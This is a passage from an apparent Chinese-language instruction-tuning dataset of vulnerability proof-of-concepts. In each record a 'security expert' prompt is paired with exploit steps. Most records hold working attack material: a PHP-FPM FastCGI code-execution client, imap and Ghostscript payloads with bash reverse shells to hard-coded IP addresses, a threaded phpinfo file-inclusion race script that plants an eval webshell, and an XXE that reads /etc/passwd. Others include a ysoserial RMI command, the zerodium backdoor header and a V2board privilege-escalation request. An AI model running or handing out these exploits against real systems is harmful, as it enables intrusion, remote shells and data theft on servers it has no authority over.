nLen < 128:\n            record += bchr(nLen)\n        else:\n            record += bchr((nLen >> 24) | 0x80) \\\n                      + bchr((nLen >> 16) & 0xFF) \\\n                      + bchr((nLen >> 8) & 0xFF) \\\n                      + bchr(nLen & 0xFF)\n        if vLen < 128:\n            record += bchr(vLen)\n        else:\n            record += bchr((vLen >> 24) | 0x80) \\\n                      + bchr((vLen >> 16) & 0xFF) \\\n                      + bchr((vLen >> 8) & 0xFF) \\\n                      + bchr(vLen & 0xFF)\n        return record + name + value\n\n    def __decodeFastCGIHeader(self, stream):\n        header = dict()\n        header['version'] = bord(stream[0])\n        header['type'] = bord(stream[1])\n        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])\n        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])\n        header['paddingLength'] = bord(stream[6])\n        header['reserved'] = bord(stream[7])\n        return header\n\n    def __decodeFastCGIRecord(self, buffer):\n        header = buffer.read(int(self.__FCGI_HEADER_SIZE))\n\n        if not header:\n            return False\n        else:\n            record = self.__decodeFastCGIHeader(header)\n            record['content'] = b''\n            \n            if 'contentLength' in record.keys():\n                contentLength = int(record['contentLength'])\n                record['content'] += buffer.read(contentLength)\n            if 'paddingLength' in record.keys():\n                skiped = buffer.read(int(record['paddingLength']))\n            return record\n\n    def request(self, nameValuePairs={}, post=''):\n        if not self.__connect():\n            print('connect failure! please check your fasctcgi-server !!')\n            return\n\n        requestId = random.randint(1, (1 << 16) - 1)\n        self.requests[requestId] = dict()\n        request = b\"\"\n        beginFCGIRecordContent = bchr(0) \\\n                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \\\n                                 + bchr(self.keepalive) \\\n                                 + bchr(0) * 5\n        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,\n                                              beginFCGIRecordContent, requestId)\n        paramsRecord = b''\n        if nameValuePairs:\n            for (name, value) in nameValuePairs.items():\n                name = force_bytes(name)\n                value = force_bytes(value)\n                paramsRecord += self.__encodeNameValueParams(name, value)\n\n        if paramsRecord:\n            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)\n        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)\n\n        if post:\n            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)\n        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)\n\n        self.sock.send(request)\n        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND\n        self.requests[requestId]['response'] = b''\n        return self.__waitForResponse(requestId)\n\n    def __waitForResponse(self, requestId):\n        data = b''\n        while True:\n            buf = self.sock.recv(512)\n            if not len(buf):\n                break\n            data += buf\n\n        data = BytesIO(data)\n        while True:\n            response = self.__decodeFastCGIRecord(data)\n            if not response:\n                break\n            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \\\n                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:\n                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:\n                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR\n                if requestId == int(response['requestId']):\n                    self.requests[requestId]['response'] += response['content']\n            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:\n                self.requests[requestId]\n        return self.requests[requestId]['response']\n\n    def __repr__(self):\n        return \"fastcgi connect host:{} port:{}\".format(self.host, self.port)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')\n    parser.add_argument('host', help='Target host, such as 127.0.0.1')\n    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')\n    parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')\n    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)\n\n    args = parser.parse_args()\n\n    client = FastCGIClient(args.host, args.port, 3, 0)\n    params = dict()\n    documentRoot = \"/\"\n    uri = args.file\n    content = args.code\n    params = {\n        'GATEWAY_INTERFACE': 'FastCGI/1.0',\n        'REQUEST_METHOD': 'POST',\n        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),\n        'SCRIPT_NAME': uri,\n        'QUERY_STRING': '',\n        'REQUEST_URI': uri,\n        'DOCUMENT_ROOT': documentRoot,\n        'SERVER_SOFTWARE': 'php/fcgiclient',\n        'REMOTE_ADDR': '127.0.0.1',\n        'REMOTE_PORT': '9985',\n        'SERVER_ADDR': '127.0.0.1',\n        'SERVER_PORT': '80',\n        'SERVER_NAME': \"localhost\",\n        'SERVER_PROTOCOL': 'HTTP/1.1',\n        'CONTENT_TYPE': 'application/text',\n        'CONTENT_LENGTH': \"%d\" % len(content),\n        'PHP_VALUE': 'auto_prepend_file = php://input',\n        'PHP_ADMIN_VALUE': 'allow_url_include = On'\n    }\n    response = client.request(params, content)\n    print(force_text(response))\n3. __FCGI_TYPE_UNKOWNTYPE = 11\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP-FPM Fastcgi 未授权访问漏洞.md"}
    127. 

  127. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP imap 远程命令执行漏洞 CVE-2018-19518\n漏洞描述:php imap 扩展用于在 PHP 中执行邮件收发操作。其 `imap_open` 函数会调用 rsh 来连接远程 shell,而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能(也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令)。 因为 ssh 命令中可以通过设置 `-oProxyCommand=` 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 参考链接: - https://bugs.php.net/bug.php?id=77153 - https://github.com/Bo0oM/PHP_imap_open_exploit - https://antichat.com/threads/463395/#post-4254681 - https://nvd.nist.gov/vuln/detail/CVE-2018-19518\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2018-19518\n【POC利用方法】\n1. docker compose up -d\n2. POST / HTTP/1.1\nHost: your-ip\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 125\n\nhostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222\n3. # Payload\necho \"/bin/bash -i >& /dev/tcp/60.204.216.3/8888 0>&1\" > /tmp/a\n\n# Base64 Encode\nZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjEiID4gL3RtcC9h\n# URL Encode\nZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h\n# 组装Payload\n# hostname=x+-oProxyCommand%3decho%09[PAYLOAD]|base64%09-d|sh}&username=111&password=222\nhostname=x+-oProxyCommand%3decho%09ZWNobyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA%2bJjEiID4gL3RtcC9h|base64%09-d|sh}&username=111&password=222\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP imap 远程命令执行漏洞 CVE-2018-19518.md"}
    128. 

  128. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GO TLS握手 崩溃漏洞 CVE-2021-34558\n漏洞描述:There is a minor modification to ./vendor/github.com/refraction-networking/utls/handshake_server.go to enable the malicious handshake to be sent with a mismatching certificate/cipher.\n影响版本:``` Go Version < (1.16.6+) ```\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2021-34558\n【POC利用方法】\n1. Go Version < (1.16.6+)\n2. 将会生成 https 服务,此时当版本较低时就会产生崩溃,例如部分扫描器对目标进行扫描时\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/GO TLS握手 崩溃漏洞 CVE-2021-34558.md"}
    129. 

  129. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP-FPM 远程代码执行漏洞 CVE-2019-11043\n漏洞描述:在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 参考链接: - https://bugs.php.net/bug.php?id=78599 - https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ - https://github.com/neex/phuip-fpizdam\n影响版本:在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响: ``` PHP 7.0 版本 PHP 7.1 版本 PHP 7.2 版本 PHP 7.3 版本 ``` 另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行。\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2019-11043\n【POC利用方法】\n1. PHP 7.0 版本\nPHP 7.1 版本\nPHP 7.2 版本\nPHP 7.3 版本\n2. docker-compose up -d\n3. $ go run . \"http://your-ip:8080/index.php\"\n2019/10/23 19:41:00 Base status code is 200\n2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate\n2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]\n2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect\n2019/10/23 19:41:02 Trying to set \"session.auto_start=0\"...\n2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS\n2019/10/23 19:41:02 Performing attack using php.ini settings...\n2019/10/23 19:41:02 Success! Was able to execute a command by appending \"?a=/bin/sh+-c+'which+which'&\" to URLs\n2019/10/23 19:41:02 Trying to cleanup /tmp/a...\n2019/10/23 19:41:02 Done!\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP-FPM 远程代码执行漏洞 CVE-2019-11043.md"}
    130. 

  130. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP 环境 XML 外部实体注入漏洞(XXE)\n漏洞描述:libxml 2.9.0 以后,默认不解析外部实体,导致 XXE 漏洞逐渐消亡。为了演示 PHP 环境下的 XXE 漏洞,本例会将 libxml 2.8.0 版本编译进 PHP 中。PHP 版本并不影响 XXE 利用。\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. docker compose up -d\n2. $ tree .\n.\n├── dom.php # 示例:使用DOMDocument解析body\n├── index.php\n├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body\n└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body\n3. <?xml version=\"1.0\" encoding=\"utf-8\"?> \n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\n<root>\n<name>&xxe;</name>\n</root>\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP 环境 XML外部实体注入漏洞(XXE).md"}
    131. 

  131. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JDWP 调试接口 RCE 漏洞\n漏洞描述:JDWP(Java Debug Wire Protocol,Java调试线协议)是一个为Java调试而设计的通讯交互协议,它定义了调试器(Debugger)和被调试JVM(Debuggee)进程之间的交互数据的传递格式,它详细完整地定义了请求命令、回应数据和错误代码,保证了调试端和被调试端之间通信通畅。 JDWP是JVM或者类JVM的虚拟机都支持的一种协议,通过该协议,Debugger端和被调试JVM之间进行通信,可以获取被调试JVM的包括类、对象、线程等信息。 参考阅读: - https://forum.butian.net/share/1232\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000\n2. # 执行wget命令下载Tomcat安装包\nwget http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz\n\n# 解压安装包\ntar zxvf apache-tomcat-8.5.43.tar.gz\n\n# 将程序安装包复制到指定运行目录下\nsudo mv apache-tomcat-8.5.43 /usr/local/tomcat8\n3. CATALINA_OPTS=\"-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=*:8000\"\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/JDWP 调试接口 RCE 漏洞.md"}
    132. 

  132. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Python PIL 远程命令执行漏洞 CVE-2018-16509\n漏洞描述:通过 Ghostscript CVE-2018-16509 执行 Python PIL/Pillow 远程 Shell 命令。 Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 常常作为另一个软件(例如 ImageMagick)的依赖项安装在生产服务器中(例如`/usr/local/bin/gs`,或`/usr/bin/gs`) 。 CVE-2018-16509漏洞允许在 v9.24 之前的 Ghostscript 中通过-dSAFER 实现绕过,通过处理 PostScript 中的失败恢复 (grestore) 来执行任意命令,禁用 LockSafetyParams ,避免无效访问。 此漏洞存在于 ImageMagick 等库或带有 Ghotscript 的编程语言中的图像库(本例中为 PIL/Pillow)中。\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2018-16509\n【POC利用方法】\n1. docker-compose up -d\n2. @app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        file = request.files.get('image', None)\n\n        if not file:\n            flash('No image found')\n            return redirect(request.url)\n\n        filename = file.filename\n        ext = path.splitext(filename)[1]\n\n        if (ext not in ['.jpg', '.jpeg', '.png', '.gif', '.bmp']):\n            flash('Invalid extension')\n            return redirect(request.url)\n\n        tmp = tempfile.mktemp(\"test\")\n        img_path = \"{}.{}\".format(tmp, ext)\n\n        file.save(img_path)\n\n        img = Image.open(img_path)\n        w, h = img.size\n        ratio = 256.0 / max(w, h)\n\n        resized_img = img.resize((int(w * ratio), int(h * ratio)))\n        resized_img.save(img_path)\n3. # Build Ghostscript command\n    command = [\"gs\",\n               \"-q\",                         # quiet mode\n               \"-g%dx%d\" % size,             # set output geometry (pixels)\n               \"-r%fx%f\" % res,              # set input DPI (dots per inch)\n               \"-dBATCH\",                    # exit after processing\n               \"-dNOPAUSE\",                  # don't pause between pages\n               \"-dSAFER\",                    # safe mode\n               \"-sDEVICE=ppmraw\",            # ppm driver\n               \"-sOutputFile=%s\" % outfile,  # output file\n               \"-c\", \"%d %d translate\" % (-bbox[0], -bbox[1]),\n                                             # adjust for image origin\n               \"-f\", infile,                 # input file\n               \"-c\", \"showpage\",             # showpage (see: https://bugs.ghostscript.com/show_bug.cgi?id=698272)\n               ]\n\n\n    ....\n\n    try:\n        with open(os.devnull, 'w+b') as devnull:\n            startupinfo = None\n            if sys.platform.startswith('win'):\n                startupinfo = subprocess.STARTUPINFO()\n                startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n            subprocess.check_call(command, stdin=devnull, stdout=devnull,\n                                  startupinfo=startupinfo)\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Python PIL 远程命令执行漏洞 CVE-2018-16509.md"}
    133. 

  133. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP 利用 GNU C Iconv 将文件读取提升至 RCE CVE-2024-2961\n漏洞描述:GNU C 是一个标准的 ISO C 依赖库。在 GNU C 中,`iconv()` 函数 2.39 及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。 如果一个 PHP 应用中存在任意文件读取漏洞,攻击者可以利用 `iconv()` 的这个 CVE-2024-2961 漏洞,将其提升为代码执行漏洞。 参考链接: - https://www.ambionics.io/blog/iconv-cve-2024-2961-p1\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2024-2961\n【POC利用方法】\n1. docker compose up -d\n2. POST /index.php HTTP/1.1\nHost: your-ip:8080\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36\nAccept: */*\nContent-Length: 20\n\nfile=%2Fetc%2Fpasswd\n3. pip install pwntools\npip install https://github.com/cfreal/ten/archive/refs/heads/main.zip\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP 利用 GNU C Iconv 将文件读取提升至 RCE CVE-2024-2961.md"}
    134. 

  134. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP 利用 phpinfo 包含临时文件 getshell\n漏洞描述:PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell。因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时文件名,进而进行包含。 参考链接: - https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. docker compose up -d\n2. #!/usr/bin/python \nimport sys\nimport threading\nimport socket\n\ndef setup(host, port):\n    TAG=\"Security Test\"\n    PAYLOAD=\"\"\"%s\\r\n<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\\r\"\"\" % TAG\n    REQ1_DATA=\"\"\"-----------------------------7dbff1ded0714\\r\nContent-Disposition: form-data; name=\"dummyname\"; filename=\"test.txt\"\\r\nContent-Type: text/plain\\r\n\\r\n%s\n-----------------------------7dbff1ded0714--\\r\"\"\" % PAYLOAD\n    padding=\"A\" * 5000\n    REQ1=\"\"\"POST /phpinfo.php?a=\"\"\"+padding+\"\"\" HTTP/1.1\\r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=\"\"\"+padding+\"\"\"\\r\nHTTP_ACCEPT: \"\"\" + padding + \"\"\"\\r\nHTTP_USER_AGENT: \"\"\"+padding+\"\"\"\\r\nHTTP_ACCEPT_LANGUAGE: \"\"\"+padding+\"\"\"\\r\nHTTP_PRAGMA: \"\"\"+padding+\"\"\"\\r\nContent-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\\r\nContent-Length: %s\\r\nHost: %s\\r\n\\r\n%s\"\"\" %(len(REQ1_DATA),host,REQ1_DATA)\n    #modify this to suit the LFI script   \n    LFIREQ=\"\"\"GET /lfi.php?file=%s HTTP/1.1\\r\nUser-Agent: Mozilla/4.0\\r\nProxy-Connection: Keep-Alive\\r\nHost: %s\\r\n\\r\n\\r\n\"\"\"\n    return (REQ1, TAG, LFIREQ)\n\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    \n\n    s.connect((host, port))\n    s2.connect((host, port))\n\n    s.send(phpinforeq)\n    d = \"\"\n    while len(d) < offset:\n        d += s.recv(offset)\n    try:\n        i = d.index(\"[tmp_name] =&gt; \")\n        fn = d[i+17:i+31]\n    except ValueError:\n        return None\n\n    s2.send(lfireq % (fn, host))\n    d = s2.recv(4096)\n    s.close()\n    s2.close()\n\n    if d.find(tag) != -1:\n        return fn\n\ncounter=0\nclass ThreadWorker(threading.Thread):\n    def __init__(self, e, l, m, *args):\n        threading.Thread.__init__(self)\n        self.event = e\n        self.lock =  l\n        self.maxattempts = m\n        self.args = args\n\n    def run(self):\n        global counter\n        while not self.event.is_set():\n            with self.lock:\n                if counter >= self.maxattempts:\n                    return\n                counter+=1\n\n            try:\n                x = phpInfoLFI(*self.args)\n                if self.event.is_set():\n                    break                \n                if x:\n                    print \"\\nGot it! Shell created in /tmp/g\"\n                    self.event.set()\n                    \n            except socket.error:\n                return\n    \n\ndef getOffset(host, port, phpinforeq):\n    \"\"\"Gets offset of tmp_name in the php output\"\"\"\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host,port))\n    s.send(phpinforeq)\n    \n    d = \"\"\n    while True:\n        i = s.recv(4096)\n        d+=i        \n        if i == \"\":\n            break\n        # detect the final chunk\n        if i.endswith(\"0\\r\\n\\r\\n\"):\n            break\n    s.close()\n    i = d.find(\"[tmp_name] =&gt; \")\n    if i == -1:\n        raise ValueError(\"No php tmp_name in phpinfo output\")\n    \n    print \"found %s at %i\" % (d[i:i+10],i)\n    # padded up a bit\n    return i+256\n\ndef main():\n    \n    print \"LFI With PHPInfo()\"\n    print \"-=\" * 30\n\n    if len(sys.argv) < 2:\n        print \"Usage: %s host [port] [threads]\" % sys.argv[0]\n        sys.exit(1)\n\n    try:\n        host = socket.gethostbyname(sys.argv[1])\n    except socket.error, e:\n        print \"Error with hostname %s: %s\" % (sys.argv[1], e)\n        sys.exit(1)\n\n    port=80\n    try:\n        port = int(sys.argv[2])\n    except IndexError:\n        pass\n    except ValueError, e:\n        print \"Error with port %d: %s\" % (sys.argv[2], e)\n        sys.exit(1)\n    \n    poolsz=10\n    try:\n        poolsz = int(sys.argv[3])\n    except IndexError:\n        pass\n    except ValueError, e:\n        print \"Error with poolsz %d: %s\" % (sys.argv[3], e)\n        sys.exit(1)\n\n    print \"Getting initial offset...\",  \n    reqphp, tag, reqlfi = setup(host, port)\n    offset = getOffset(host, port, reqphp)\n    sys.stdout.flush()\n\n    maxattempts = 1000\n    e = threading.Event()\n    l = threading.Lock()\n\n    print \"Spawning worker pool (%d)...\" % poolsz\n    sys.stdout.flush()\n\n    tp = []\n    for i in range(0,poolsz):\n        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\n\n    for t in tp:\n        t.start()\n    try:\n        while not e.wait(1):\n            if e.is_set():\n                break\n            with l:\n                sys.stdout.write( \"\\r% 4d / % 4d\" % (counter, maxattempts))\n                sys.stdout.flush()\n                if counter >= maxattempts:\n                    break\n        print\n        if e.is_set():\n            print \"Woot!  \\m/\"\n        else:\n            print \":(\"\n    except KeyboardInterrupt:\n        print \"\\nTelling threads to shutdown...\"\n        e.set()\n    \n    print \"Shuttin' down...\"\n    for t in tp:\n        t.join()\n\nif __name__==\"__main__\":\n    main()\n3. TAG=\"Security Test\"\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP 利用 phpinfo 包含临时文件 getshell.md"}
    135. 

  135. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JDWP调试接口 RCE 漏洞\n漏洞描述:JDWP(Java Debug Wire Protocol,Java调试线协议)是一个为Java调试而设计的通讯交互协议,它定义了调试器(Debugger)和被调试JVM(Debuggee)进程之间的交互数据的传递格式,它详细完整地定义了请求命令、回应数据和错误代码,保证了调试端和被调试端之间通信通畅。 JDWP是JVM或者类JVM的虚拟机都支持的一种协议,通过该协议,Debugger端和被调试JVM之间进行通信,可以获取被调试JVM的包括类、对象、线程等信息。 参考阅读: - https://forum.butian.net/share/1232\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000\n2. # 执行wget命令下载Tomcat安装包\nwget http://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz\n\n# 解压安装包\ntar zxvf apache-tomcat-8.5.43.tar.gz\n\n# 将程序安装包复制到指定运行目录下\nsudo mv apache-tomcat-8.5.43 /usr/local/tomcat8\n3. CATALINA_OPTS=\"-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=*:8000\"\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/JDWP调试接口 RCE 漏洞.md"}
    136. 

  136. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Java RMI Registry 反序列化漏洞(<=jdk8u111)\n漏洞描述:Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1)。\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose run -e RMIIP=your-ip -p 1099:1099 rmi\n2. java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 \"curl your-dnslog-server\"\n3. java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 \"curl your-dnslog-server\"\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Java RMI Registry 反序列化漏洞(=jdk8u111).md"}
    137. 

  137. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Python PIL 远程命令执行漏洞 CVE-2017-8291\n漏洞描述:Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。 参考阅读: - http://blog.neargle.com/2017/09/28/Exploiting-Python-PIL-Module-Command-Execution-Vulnerability/\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2017-8291\n【POC利用方法】\n1. command = [\"gs\",\n            \"-q\",                         # quiet mode\n            \"-g%dx%d\" % size,             # set output geometry (pixels)\n            \"-r%fx%f\" % res,              # set input DPI (dots per inch)\n            \"-dBATCH\",                    # exit after processing\n            \"-dNOPAUSE\",                  # don't pause between pages,\n            \"-dSAFER\",                    # safe mode\n            \"-sDEVICE=ppmraw\",            # ppm driver\n            \"-sOutputFile=%s\" % outfile,  # output file\n            \"-c\", \"%d %d translate\" % (-bbox[0], -bbox[1]),\n                                            # adjust for image origin\n            \"-f\", infile,                 # input file\n            ]\n\n# 省略判断是GhostScript是否安装的代码\ntry:\n    with open(os.devnull, 'w+b') as devnull:\n        subprocess.check_call(command, stdin=devnull, stdout=devnull)\n    im = Image.open(outfile)\n2. docker-compose up -d\n3. currentdevice null false mark /OutputFile (%pipe%bash -c \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\")\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Python PIL 远程命令执行漏洞 CVE-2017-8291.md"}
    138. 

  138. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP zerodium后门漏洞\n漏洞描述:PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。 目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitHub上进行。\n影响版本:``` PHP 8.1.0-dev ```\n网络测绘:``` \"PHP/8.1.0-dev\" ```\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. PHP 8.1.0-dev\n2. \"PHP/8.1.0-dev\"\n3. User-Agentt: zerodiumsystem('id');\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP zerodium后门漏洞.md"}
    139. 

  139. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:V2board 1.6.1 提权漏洞\n漏洞描述:V2board是一个多用户代理工具管理面板。在其1.6.1版本中,引入了对于用户Session的缓存机制,服务器会将用户的认证信息储存在Redis缓存中。 但由于读取缓存时没有校验该用户是普通用户还是管理员,导致普通用户的认证信息即可访问管理员接口,造成提权漏洞。 参考链接: - <https://github.com/v2board/v2board/commit/5976bcc65a61f7942ed4074b9274236d9d55d5f0>\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. curl -i -s -k -XPOST --data-binary \"email=threeki%40abc.com&password=threeki@wh0am1\" http://your-ip:8080/api/v1/passport/auth/login\n3. GET /api/v1/user/info HTTP/1.1\nHost: your-ip:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nConnection: close\nAuthorization: dGhyZWVraUBhYmMuY29tOiQyeSQxMCRnb1UzUDBCL25ocTg2blZvYTUvRm5PbVpKUG5yTFptZ2hJa3FUNUdRYndVL003WXNpdVlqMg==\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/V2board 1.6.1 提权漏洞.md"}
    140. 

